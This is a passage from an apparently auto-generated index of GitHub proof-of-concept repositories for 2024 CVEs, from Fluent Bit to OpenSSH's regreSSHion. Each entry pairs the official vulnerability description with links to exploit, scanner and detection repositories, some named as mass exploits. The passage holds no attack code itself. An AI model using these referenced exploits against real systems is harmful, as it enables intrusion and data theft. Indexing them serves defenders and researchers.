A memory corruption vulnerability in Fluent Bit versions 2.0.7 thru 3.0.3. This issue lies in the embedded http server’s parsing of trace requests and may result in denial of service conditions, information disclosure, or remote code execution.
- [skilfoy/CVE-2024-4323-Exploit-POC](https://github.com/skilfoy/CVE-2024-4323-Exploit-POC)
- [d0rb/CVE-2024-4323](https://github.com/d0rb/CVE-2024-4323)
- [yuansec/CVE-2024-4323-dos_poc](https://github.com/yuansec/CVE-2024-4323-dos_poc)
### CVE-2024-4352 (2024-05-16)
The Tutor LMS Pro plugin for WordPress is vulnerable to unauthorized access of data, modification of data, loss of data due to a missing capability check on the 'get_calendar_materials' function. The plugin is also vulnerable to SQL Injection via the ‘year’ parameter of that function due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
- [truonghuuphuc/CVE-2024-4352-Poc](https://github.com/truonghuuphuc/CVE-2024-4352-Poc)
### CVE-2024-4358 (2024-05-29)
In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.
- [sinsinology/CVE-2024-4358](https://github.com/sinsinology/CVE-2024-4358)
- [RevoltSecurities/CVE-2024-4358](https://github.com/RevoltSecurities/CVE-2024-4358)
- [Harydhk7/CVE-2024-4358](https://github.com/Harydhk7/CVE-2024-4358)
- [Sk1dr0wz/CVE-2024-4358_Mass_Exploit](https://github.com/Sk1dr0wz/CVE-2024-4358_Mass_Exploit)
- [verylazytech/CVE-2024-4358](https://github.com/verylazytech/CVE-2024-4358)
- [fa-rrel/CVE-2024-4358](https://github.com/fa-rrel/CVE-2024-4358)
### CVE-2024-4367 (2024-05-14)
A type check was missing when handling fonts in PDF.js, which would allow arbitrary JavaScript execution in the PDF.js context. This vulnerability affects Firefox < 126, Firefox ESR < 115.11, and Thunderbird < 115.11.
- [LOURC0D3/CVE-2024-4367-PoC](https://github.com/LOURC0D3/CVE-2024-4367-PoC)
- [s4vvysec/CVE-2024-4367-POC](https://github.com/s4vvysec/CVE-2024-4367-POC)
- [spaceraccoon/detect-cve-2024-4367](https://github.com/spaceraccoon/detect-cve-2024-4367)
- [clarkio/pdfjs-vuln-demo](https://github.com/clarkio/pdfjs-vuln-demo)
- [avalahEE/pdfjs_disable_eval](https://github.com/avalahEE/pdfjs_disable_eval)
- [Zombie-Kaiser/cve-2024-4367-PoC-fixed](https://github.com/Zombie-Kaiser/cve-2024-4367-PoC-fixed)
- [snyk-labs/pdfjs-vuln-demo](https://github.com/snyk-labs/pdfjs-vuln-demo)
- [UnHackerEnCapital/PDFernetRemotelo](https://github.com/UnHackerEnCapital/PDFernetRemotelo)
- [Masamuneee/CVE-2024-4367-Analysis](https://github.com/Masamuneee/CVE-2024-4367-Analysis)
### CVE-2024-4406 (2024-05-02)
Xiaomi Pro 13 GetApps integral-dialog-page Cross-Site Scripting Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Xiaomi Pro 13 smartphones. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the integral-dialog-page.html file. When parsing the integralInfo parameter, the process does not properly sanitize user-supplied data, which can lead to the injection of an arbitrary script. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-22332.
- [Yogehi/cve-2024-4406-xiaomi13pro-exploit-files](https://github.com/Yogehi/cve-2024-4406-xiaomi13pro-exploit-files)
### CVE-2024-4439 (2024-05-03)
WordPress Core is vulnerable to Stored Cross-Site Scripting via user display names in the Avatar block in various versions up to 6.5.2 due to insufficient output escaping on the display name. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. In addition, it also makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that have the comment block present and display the comment author's avatar.
- [MielPopsssssss/CVE-2024-4439](https://github.com/MielPopsssssss/CVE-2024-4439)
- [d0rb/CVE-2024-4439](https://github.com/d0rb/CVE-2024-4439)
- [xssor-dz/-CVE-2024-4439](https://github.com/xssor-dz/-CVE-2024-4439)
- [soltanali0/CVE-2024-4439](https://github.com/soltanali0/CVE-2024-4439)
### CVE-2024-4443 (2024-05-22)
The Business Directory Plugin – Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the ‘listingfields’ parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
- [truonghuuphuc/CVE-2024-4443-Poc](https://github.com/truonghuuphuc/CVE-2024-4443-Poc)
### CVE-2024-4484 (2024-05-24)
The The Plus Addons for Elementor – Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘xai_username’ parameter in versions up to, and including, 5.5.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
- [Abo5/CVE-2024-4484](https://github.com/Abo5/CVE-2024-4484)
### CVE-2024-4577 (2024-06-09)
In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.
- [TAM-K592/CVE-2024-4577](https://github.com/TAM-K592/CVE-2024-4577)
- [ohhhh693/CVE-2024-4577](https://github.com/ohhhh693/CVE-2024-4577)
- [Junp0/CVE-2024-4577](https://github.com/Junp0/CVE-2024-4577)
- [princew88/CVE-2024-4577](https://github.com/princew88/CVE-2024-4577)
- [11whoami99/CVE-2024-4577](https://github.com/11whoami99/CVE-2024-4577)
- [watchtowrlabs/CVE-2024-4577](https://github.com/watchtowrlabs/CVE-2024-4577)
- [zjhzjhhh/CVE-2024-4577](https://github.com/zjhzjhhh/CVE-2024-4577)
- [huseyinstif/CVE-2024-4577-Nuclei-Template](https://github.com/huseyinstif/CVE-2024-4577-Nuclei-Template)
- [taida957789/CVE-2024-4577](https://github.com/taida957789/CVE-2024-4577)
- [Wh02m1/CVE-2024-4577](https://github.com/Wh02m1/CVE-2024-4577)
- [Sysc4ll3r/CVE-2024-4577](https://github.com/Sysc4ll3r/CVE-2024-4577)
- [WanLiChangChengWanLiChang/CVE-2024-4577-RCE-EXP](https://github.com/WanLiChangChengWanLiChang/CVE-2024-4577-RCE-EXP)
- [BitMEXResearch/CVE-2024-4577](https://github.com/BitMEXResearch/CVE-2024-4577)
- [0x20c/CVE-2024-4577-nuclei](https://github.com/0x20c/CVE-2024-4577-nuclei)
- [manuelinfosec/CVE-2024-4577](https://github.com/manuelinfosec/CVE-2024-4577)
- [zomasec/CVE-2024-4577](https://github.com/zomasec/CVE-2024-4577)
- [ZephrFish/CVE-2024-4577-PHP-RCE](https://github.com/ZephrFish/CVE-2024-4577-PHP-RCE)
- [xcanwin/CVE-2024-4577-PHP-RCE](https://github.com/xcanwin/CVE-2024-4577-PHP-RCE)
- [dbyMelina/CVE-2024-4577](https://github.com/dbyMelina/CVE-2024-4577)
- [Chocapikk/CVE-2024-4577](https://github.com/Chocapikk/CVE-2024-4577)
- [K3ysTr0K3R/CVE-2024-4577-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2024-4577-EXPLOIT)
- [it-t4mpan/check_cve_2024_4577.sh](https://github.com/it-t4mpan/check_cve_2024_4577.sh)
- [bl4cksku11/CVE-2024-4577](https://github.com/bl4cksku11/CVE-2024-4577)
- [nemu1k5ma/CVE-2024-4577](https://github.com/nemu1k5ma/CVE-2024-4577)
- [aaddmin1122345/cve-2024-4577](https://github.com/aaddmin1122345/cve-2024-4577)
- [d3ck4/Shodan-CVE-2024-4577](https://github.com/d3ck4/Shodan-CVE-2024-4577)
- [Entropt/CVE-2024-4577_Analysis](https://github.com/Entropt/CVE-2024-4577_Analysis)
- [XiangDongCJC/CVE-2024-4577-PHP-CGI-RCE](https://github.com/XiangDongCJC/CVE-2024-4577-PHP-CGI-RCE)
- [hexedbyte/cve-2024-4577](https://github.com/hexedbyte/cve-2024-4577)
- [Sh0ckFR/CVE-2024-4577](https://github.com/Sh0ckFR/CVE-2024-4577)
- [gotr00t0day/CVE-2024-4577](https://github.com/gotr00t0day/CVE-2024-4577)
- [VictorShem/CVE-2024-4577](https://github.com/VictorShem/CVE-2024-4577)
- [jakabakos/CVE-2024-4577-PHP-CGI-argument-injection-RCE](https://github.com/jakabakos/CVE-2024-4577-PHP-CGI-argument-injection-RCE)
- [PhinehasNarh/CVE-2024-4577-LetsDefend-walkthrough](https://github.com/PhinehasNarh/CVE-2024-4577-LetsDefend-walkthrough)
- [ggfzx/CVE-2024-4577](https://github.com/ggfzx/CVE-2024-4577)
- [olebris/CVE-2024-4577](https://github.com/olebris/CVE-2024-4577)
- [AlperenY-cs/CVE-2024-4577](https://github.com/AlperenY-cs/CVE-2024-4577)
- [charis3306/CVE-2024-4577](https://github.com/charis3306/CVE-2024-4577)
- [l0n3m4n/CVE-2024-4577-RCE](https://github.com/l0n3m4n/CVE-2024-4577-RCE)
- [bibo318/CVE-2024-4577-RCE-ATTACK](https://github.com/bibo318/CVE-2024-4577-RCE-ATTACK)
- [waived/CVE-2024-4577-PHP-RCE](https://github.com/waived/CVE-2024-4577-PHP-RCE)
- [nNoSuger/CVE-2024-4577](https://github.com/nNoSuger/CVE-2024-4577)
- [a-roshbaik/CVE-2024-4577](https://github.com/a-roshbaik/CVE-2024-4577)
- [a-roshbaik/CVE-2024-4577-PHP-RCE](https://github.com/a-roshbaik/CVE-2024-4577-PHP-RCE)
- [Jcccccx/CVE-2024-4577](https://github.com/Jcccccx/CVE-2024-4577)
- [bughuntar/CVE-2024-4577](https://github.com/bughuntar/CVE-2024-4577)
- [fa-rrel/CVE-2024-4577-RCE](https://github.com/fa-rrel/CVE-2024-4577-RCE)
- [ywChen-NTUST/PHP-CGI-RCE-Scanner](https://github.com/ywChen-NTUST/PHP-CGI-RCE-Scanner)
- [AhmedMansour93/Event-ID-268-Rule-Name-SOC292-Possible-PHP-Injection-Detected-CVE-2024-4577-](https://github.com/AhmedMansour93/Event-ID-268-Rule-Name-SOC292-Possible-PHP-Injection-Detected-CVE-2024-4577-)
- [phirojshah/CVE-2024-4577](https://github.com/phirojshah/CVE-2024-4577)
- [JeninSutradhar/CVE-2024-4577-checker](https://github.com/JeninSutradhar/CVE-2024-4577-checker)
- [longhoangth18/CVE-2024-4577](https://github.com/longhoangth18/CVE-2024-4577)
- [0xbd2/CVE-2024-4577](https://github.com/0xbd2/CVE-2024-4577)
### CVE-2024-4701 (2024-05-10)
A path traversal issue potentially leading to remote code execution in Genie for all versions prior to 4.3.18
- [JoeBeeton/CVE-2024-4701-POC](https://github.com/JoeBeeton/CVE-2024-4701-POC)
### CVE-2024-4761 (2024-05-14)
Out of bounds write in V8 in Google Chrome prior to 124.0.6367.207 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: High)
- [michredteam/CVE-2024-4761](https://github.com/michredteam/CVE-2024-4761)
### CVE-2024-4875 (2024-05-21)
The HT Mega – Absolute Addons For Elementor plugin for WordPress is vulnerable to unauthorized modification of data|loss of data due to a missing capability check on the 'ajax_dismiss' function in versions up to, and including, 2.5.2. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to update options such as users_can_register, which can lead to unauthorized user registration.
- [RandomRobbieBF/CVE-2024-4875](https://github.com/RandomRobbieBF/CVE-2024-4875)
### CVE-2024-4879 (2024-07-10)
ServiceNow has addressed an input validation vulnerability that was identified in Vancouver and Washington DC Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. ServiceNow applied an update to hosted instances, and ServiceNow released the update to our partners and self-hosted customers. Listed below are the patches and hot fixes that address the vulnerability. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.
- [Brut-Security/CVE-2024-4879](https://github.com/Brut-Security/CVE-2024-4879)
- [bigb0x/CVE-2024-4879](https://github.com/bigb0x/CVE-2024-4879)
- [Mr-r00t11/CVE-2024-4879](https://github.com/Mr-r00t11/CVE-2024-4879)
- [zgimszhd61/CVE-2024-4879](https://github.com/zgimszhd61/CVE-2024-4879)
- [ShadowByte1/CVE-2024-4879](https://github.com/ShadowByte1/CVE-2024-4879)
- [Praison001/CVE-2024-4879-ServiceNow](https://github.com/Praison001/CVE-2024-4879-ServiceNow)
- [NoTsPepino/CVE-2024-4879-CVE-2024-5217-ServiceNow-RCE-Scanning](https://github.com/NoTsPepino/CVE-2024-4879-CVE-2024-5217-ServiceNow-RCE-Scanning)
- [jdusane/CVE-2024-4879](https://github.com/jdusane/CVE-2024-4879)
- [fa-rrel/CVE-2024-4879](https://github.com/fa-rrel/CVE-2024-4879)
- [0xWhoami35/CVE-2024-4879](https://github.com/0xWhoami35/CVE-2024-4879)
### CVE-2024-4883 (2024-06-25)
In WhatsUp Gold versions released before 2023.1.3, a Remote Code Execution issue exists in Progress WhatsUp Gold. This vulnerability allows an unauthenticated attacker to achieve the RCE as a service account through NmApi.exe.
- [sinsinology/CVE-2024-4883](https://github.com/sinsinology/CVE-2024-4883)
### CVE-2024-4885 (2024-06-25)
In WhatsUp Gold versions released before 2023.1.3, an unauthenticated Remote Code Execution vulnerability in Progress WhatsUpGold. The \n\nWhatsUp.ExportUtilities.Export.GetFileWithoutZip\n\n\n\n allows execution of commands with iisapppool\nmconsole privileges.
- [sinsinology/CVE-2024-4885](https://github.com/sinsinology/CVE-2024-4885)
### CVE-2024-4898 (2024-06-12)
The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary option updates due to a missing authorization checks on the REST API calls in all versions up to, and including, 0.1.0.38. This makes it possible for unauthenticated attackers to connect the site to InstaWP API, edit arbitrary site options and create administrator accounts.
- [truonghuuphuc/CVE-2024-4898-Poc](https://github.com/truonghuuphuc/CVE-2024-4898-Poc)
- [cve-2024/CVE-2024-4898-Poc](https://github.com/cve-2024/CVE-2024-4898-Poc)
### CVE-2024-4947 (2024-05-15)
Type Confusion in V8 in Google Chrome prior to 125.0.6422.60 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)
- [uixss/PoC-CVE-2024-4947](https://github.com/uixss/PoC-CVE-2024-4947)
### CVE-2024-4956 (2024-05-16)
Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.
- [banditzCyber0x/CVE-2024-4956](https://github.com/banditzCyber0x/CVE-2024-4956)
- [xungzzz/CVE-2024-4956](https://github.com/xungzzz/CVE-2024-4956)
- [erickfernandox/CVE-2024-4956](https://github.com/erickfernandox/CVE-2024-4956)
- [gmh5225/CVE-2024-4956](https://github.com/gmh5225/CVE-2024-4956)
- [ifconfig-me/CVE-2024-4956-Bulk-Scanner](https://github.com/ifconfig-me/CVE-2024-4956-Bulk-Scanner)
- [thinhap/CVE-2024-4956-PoC](https://github.com/thinhap/CVE-2024-4956-PoC)
- [yagyuufellinluvv/CVE-2024-4956](https://github.com/yagyuufellinluvv/CVE-2024-4956)
- [GoatSecurity/CVE-2024-4956](https://github.com/GoatSecurity/CVE-2024-4956)
- [TypicalModMaker/CVE-2024-4956](https://github.com/TypicalModMaker/CVE-2024-4956)
- [Praison001/CVE-2024-4956-Sonatype-Nexus-Repository-Manager](https://github.com/Praison001/CVE-2024-4956-Sonatype-Nexus-Repository-Manager)
- [Cappricio-Securities/CVE-2024-4956](https://github.com/Cappricio-Securities/CVE-2024-4956)
- [fin3ss3g0d/CVE-2024-4956](https://github.com/fin3ss3g0d/CVE-2024-4956)
- [verylazytech/CVE-2024-4956](https://github.com/verylazytech/CVE-2024-4956)
- [JolyIrsb/CVE-2024-4956](https://github.com/JolyIrsb/CVE-2024-4956)
- [UMASANKAR-MG/Path-Traversal-CVE-2024-4956](https://github.com/UMASANKAR-MG/Path-Traversal-CVE-2024-4956)
- [An00bRektn/shirocrack](https://github.com/An00bRektn/shirocrack)
### CVE-2024-5009 (2024-06-25)
In WhatsUp Gold versions released before 2023.1.3, an Improper Access Control vulnerability in Wug.UI.Controllers.InstallController.SetAdminPassword allows local attackers to modify admin's password.
- [sinsinology/CVE-2024-5009](https://github.com/sinsinology/CVE-2024-5009)
- [th3gokul/CVE-2024-5009](https://github.com/th3gokul/CVE-2024-5009)
### CVE-2024-5084 (2024-05-23)
The Hash Form – Drag & Drop Form Builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'file_upload_action' function in all versions up to, and including, 1.1.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
- [KTN1990/CVE-2024-5084](https://github.com/KTN1990/CVE-2024-5084)
- [Chocapikk/CVE-2024-5084](https://github.com/Chocapikk/CVE-2024-5084)
- [k3lpi3b4nsh33/CVE-2024-5084](https://github.com/k3lpi3b4nsh33/CVE-2024-5084)
- [WOOOOONG/CVE-2024-5084](https://github.com/WOOOOONG/CVE-2024-5084)
### CVE-2024-5124 (2024-06-06)
A timing attack vulnerability exists in the gaizhenbiao/chuanhuchatgpt repository, specifically within the password comparison logic. The vulnerability is present in version 20240310 of the software, where passwords are compared using the '=' operator in Python. This method of comparison allows an attacker to guess passwords based on the timing of each character's comparison. The issue arises from the code segment that checks a password for a particular username, which can lead to the exposure of sensitive information to an unauthorized actor. An attacker exploiting this vulnerability could potentially guess user passwords, compromising the security of the system.
- [gogo2464/CVE-2024-5124](https://github.com/gogo2464/CVE-2024-5124)
### CVE-2024-5246 (2024-05-23)
NETGEAR ProSAFE Network Management System Tomcat Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of NETGEAR ProSAFE Network Management System. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the product installer. The issue results from the use of a vulnerable version of Apache Tomcat. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-22868.
- [Abdurahmon3236/CVE-2024-5246](https://github.com/Abdurahmon3236/CVE-2024-5246)
### CVE-2024-5274 (2024-05-28)
Type Confusion in V8 in Google Chrome prior to 125.0.6422.112 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)
- [Alchemist3dot14/CVE-2024-5274-Detection](https://github.com/Alchemist3dot14/CVE-2024-5274-Detection)
- [mistymntncop/CVE-2024-5274](https://github.com/mistymntncop/CVE-2024-5274)
### CVE-2024-5324 (2024-06-06)
The Login/Signup Popup ( Inline Form + Woocommerce ) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'import_settings' function in versions 2.7.1 to 2.7.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change arbitrary options on affected sites. This can be used to enable new user registration and set the default role for new users to Administrator.
- [RandomRobbieBF/CVE-2024-5324](https://github.com/RandomRobbieBF/CVE-2024-5324)
### CVE-2024-5326 (2024-05-30)
The Post Grid Gutenberg Blocks and WordPress Blog Plugin – PostX plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'postx_presets_callback' function in all versions up to, and including, 4.1.2. This makes it possible for authenticated attackers, with Contributor-level access and above, to change arbitrary options on affected sites. This can be used to enable new user registration and set the default role for new users to Administrator.
- [truonghuuphuc/CVE-2024-5326-Poc](https://github.com/truonghuuphuc/CVE-2024-5326-Poc)
- [cve-2024/CVE-2024-5326-Poc](https://github.com/cve-2024/CVE-2024-5326-Poc)
### CVE-2024-5356 (2024-05-26)
Es wurde eine Schwachstelle in anji-plus AJ-Report bis 1.4.1 gefunden. Sie wurde als kritisch eingestuft. Dabei betrifft es einen unbekannter Codeteil der Datei /dataSet/testTransform;swagger-ui. Mit der Manipulation des Arguments dynSentence mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung.
- [droyuu/Aj-Report-sql-CVE-2024-5356-POC](https://github.com/droyuu/Aj-Report-sql-CVE-2024-5356-POC)
### CVE-2024-5420 (2024-06-04)
Missing input validation in the SEH Computertechnik utnserver Pro, SEH Computertechnik utnserver ProMAX, SEH Computertechnik INU-100 web-interface allows stored Cross-Site Scripting (XSS)..This issue affects utnserver Pro, utnserver ProMAX, INU-100 version 20.1.22 and below.
- [fa-rrel/CVE-2024-5420-XSS](https://github.com/fa-rrel/CVE-2024-5420-XSS)
- [K4yd0/CVE-2024-5420_XSS](https://github.com/K4yd0/CVE-2024-5420_XSS)
### CVE-2024-5522 (2024-06-20)
The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks
- [truonghuuphuc/CVE-2024-5522-Poc](https://github.com/truonghuuphuc/CVE-2024-5522-Poc)
- [kryptonproject/CVE-2024-5522-PoC](https://github.com/kryptonproject/CVE-2024-5522-PoC)
- [geniuszlyy/CVE-2024-5522](https://github.com/geniuszlyy/CVE-2024-5522)
### CVE-2024-5633 (2024-07-09)
Longse model LBH30FE200W cameras, as well as products based on this device, provide an unrestricted access for an attacker located in the same local network to an undocumented binary service CoolView on one of the ports. \nAn attacker with a knowledge of the available commands is able to perform read/write operations on the device's memory, which might result in e.g. bypassing telnet login and obtaining full access to the device.
- [Adikso/CVE-2024-5633](https://github.com/Adikso/CVE-2024-5633)
### CVE-2024-5735 (2024-06-28)
Full Path Disclosure vulnerability in AdmirorFrames Joomla! extension in afHelper.php script allows an unauthorised attacker to retrieve location of web root folder. This issue affects AdmirorFrames: before 5.0.
- [afine-com/CVE-2024-5735](https://github.com/afine-com/CVE-2024-5735)
### CVE-2024-5736 (2024-06-28)
Server Side Request Forgery (SSRF) vulnerability in AdmirorFrames Joomla! extension in afGdStream.php script allows to access local files or server pages available only from localhost. This issue affects AdmirorFrames: before 5.0.
- [afine-com/CVE-2024-5736](https://github.com/afine-com/CVE-2024-5736)
### CVE-2024-5737 (2024-06-28)
Script afGdStream.php in AdmirorFrames Joomla! extension doesn’t specify a content type and as a result default (text/html) is used. An attacker may embed HTML tags directly in image data which is rendered by a webpage as HTML. This issue affects AdmirorFrames: before 5.0.
- [afine-com/CVE-2024-5737](https://github.com/afine-com/CVE-2024-5737)
### CVE-2024-5806 (2024-06-25)
Improper Authentication vulnerability in Progress MOVEit Transfer (SFTP module) can lead to Authentication Bypass.This issue affects MOVEit Transfer: from 2023.0.0 before 2023.0.11, from 2023.1.0 before 2023.1.6, from 2024.0.0 before 2024.0.2.
- [watchtowrlabs/watchTowr-vs-progress-moveit_CVE-2024-5806](https://github.com/watchtowrlabs/watchTowr-vs-progress-moveit_CVE-2024-5806)
### CVE-2024-5932 (2024-08-20)
The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code remotely, and to delete arbitrary files.
- [0xb0mb3r/CVE-2024-5932-PoC](https://github.com/0xb0mb3r/CVE-2024-5932-PoC)
- [EQSTLab/CVE-2024-5932](https://github.com/EQSTLab/CVE-2024-5932)
- [OxLmahdi/cve-2024-5932](https://github.com/OxLmahdi/cve-2024-5932)
### CVE-2024-5947 (2024-06-13)
Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Deep Sea Electronics DSE855 devices. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the web-based UI. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-22679.
- [Cappricio-Securities/CVE-2024-5947](https://github.com/Cappricio-Securities/CVE-2024-5947)
### CVE-2024-5961 (2024-06-14)
Improper neutralization of input during web page generation vulnerability in 2ClickPortal software allows reflected cross-site scripting (XSS). An attacker might trick somebody into using a crafted URL, which will cause a script to be run in user's browser. This issue affects 2ClickPortal software versions from 7.2.31 through 7.6.4.
- [kac89/CVE-2024-5961](https://github.com/kac89/CVE-2024-5961)
### CVE-2024-6028 (2024-06-25)
The Quiz Maker plugin for WordPress is vulnerable to time-based SQL Injection via the 'ays_questions' parameter in all versions up to, and including, 6.5.8.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
- [truonghuuphuc/CVE-2024-6028-Poc](https://github.com/truonghuuphuc/CVE-2024-6028-Poc)
### CVE-2024-6043 (2024-06-17)
Es wurde eine Schwachstelle in SourceCodester Best House Rental Management System 1.0 entdeckt. Sie wurde als kritisch eingestuft. Es geht dabei um die Funktion login der Datei admin_class.php. Durch Manipulation des Arguments username mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung.
- [lfillaz/CVE-2024-6043](https://github.com/lfillaz/CVE-2024-6043)
### CVE-2024-6050 (2024-07-01)
Improper Neutralization of Input During Web Page Generation vulnerability in SOKRATES-software SOWA OPAC allows a Reflected Cross-Site Scripting (XSS). An attacker might trick somebody into using a crafted URL, which will cause a script to be run in user's browser. This issue affects SOWA OPAC software in versions from 4.0 before 4.9.10, from 5.0 before 6.2.12.
- [kac89/CVE-2024-6050](https://github.com/kac89/CVE-2024-6050)
### CVE-2024-6095 (2024-07-06)
A vulnerability in the /models/apply endpoint of mudler/localai versions 2.15.0 allows for Server-Side Request Forgery (SSRF) and partial Local File Inclusion (LFI). The endpoint supports both http(s):// and file:// schemes, where the latter can lead to LFI. However, the output is limited due to the length of the error message. This vulnerability can be exploited by an attacker with network access to the LocalAI instance, potentially allowing unauthorized access to internal HTTP(s) servers and partial reading of local files. The issue is fixed in version 2.17.
- [Abdurahmon3236/-CVE-2024-6095](https://github.com/Abdurahmon3236/-CVE-2024-6095)
### CVE-2024-6205 (2024-07-19)
The PayPlus Payment Gateway WordPress plugin before 6.6.9 does not properly sanitise and escape a parameter before using it in a SQL statement via a WooCommerce API route available to unauthenticated users, leading to an SQL injection vulnerability.
- [j3r1ch0123/CVE-2024-6205](https://github.com/j3r1ch0123/CVE-2024-6205)
### CVE-2024-6222 (2024-07-09)
In Docker Desktop before v4.29.0, an attacker who has gained access to the Docker Desktop VM through a container breakout can further escape to the host by passing extensions and dashboard related IPC messages.\n\nDocker Desktop v4.29.0 https://docs.docker.com/desktop/release-notes/#4290 fixes the issue on MacOS, Linux and Windows with Hyper-V backend.\n\nAs exploitation requires "Allow only extensions distributed through the Docker Marketplace" to be disabled, Docker Desktop v4.31.0 https://docs.docker.com/desktop/release-notes/#4310 additionally changes the default configuration to enable this setting by default.
- [Florian-Hoth/CVE-2024-6222](https://github.com/Florian-Hoth/CVE-2024-6222)
### CVE-2024-6366 (2024-07-29)
The User Profile Builder WordPress plugin before 3.11.8 does not have proper authorisation, allowing unauthenticated users to upload media files via the async upload functionality of WP.
- [Abdurahmon3236/CVE-2024-6366](https://github.com/Abdurahmon3236/CVE-2024-6366)
### CVE-2024-6386 (2024-08-21)
The WPML plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.6.12 via the Twig Server-Side Template Injection. This is due to missing input validation and sanitization on the render function. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute code on the server.
- [argendo/CVE-2024-6386](https://github.com/argendo/CVE-2024-6386)
### CVE-2024-6387 (2024-07-01)
A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.
- [zgzhang/cve-2024-6387-poc](https://github.com/zgzhang/cve-2024-6387-poc)
- [acrono/cve-2024-6387-poc](https://github.com/acrono/cve-2024-6387-poc)
- [lflare/cve-2024-6387-poc](https://github.com/lflare/cve-2024-6387-poc)
- [shyrwall/cve-2024-6387-poc](https://github.com/shyrwall/cve-2024-6387-poc)
- [getdrive/CVE-2024-6387-PoC](https://github.com/getdrive/CVE-2024-6387-PoC)
- [FerasAlrimali/CVE-2024-6387-POC](https://github.com/FerasAlrimali/CVE-2024-6387-POC)
- [passwa11/cve-2024-6387-poc](https://github.com/passwa11/cve-2024-6387-poc)
- [jack0we/CVE-2024-6387](https://github.com/jack0we/CVE-2024-6387)
- [xaitax/CVE-2024-6387_Check](https://github.com/xaitax/CVE-2024-6387_Check)
- [bigb0x/CVE-2024-6387](https://github.com/bigb0x/CVE-2024-6387)
- [wiggels/regresshion-check](https://github.com/wiggels/regresshion-check)
- [3yujw7njai/CVE-2024-6387](https://github.com/3yujw7njai/CVE-2024-6387)
- [betancour/OpenSSH-Vulnerability-test](https://github.com/betancour/OpenSSH-Vulnerability-test)
- [zgimszhd61/cve-2024-6387-poc](https://github.com/zgimszhd61/cve-2024-6387-poc)
- [muyuanlove/CVE-2024-6387fixshell](https://github.com/muyuanlove/CVE-2024-6387fixshell)
- [TAM-K592/CVE-2024-6387](https://github.com/TAM-K592/CVE-2024-6387)
- [teamos-hub/regreSSHion](https://github.com/teamos-hub/regreSSHion)
- [Maikefee/CVE-2024-6387_Check.py](https://github.com/Maikefee/CVE-2024-6387_Check.py)
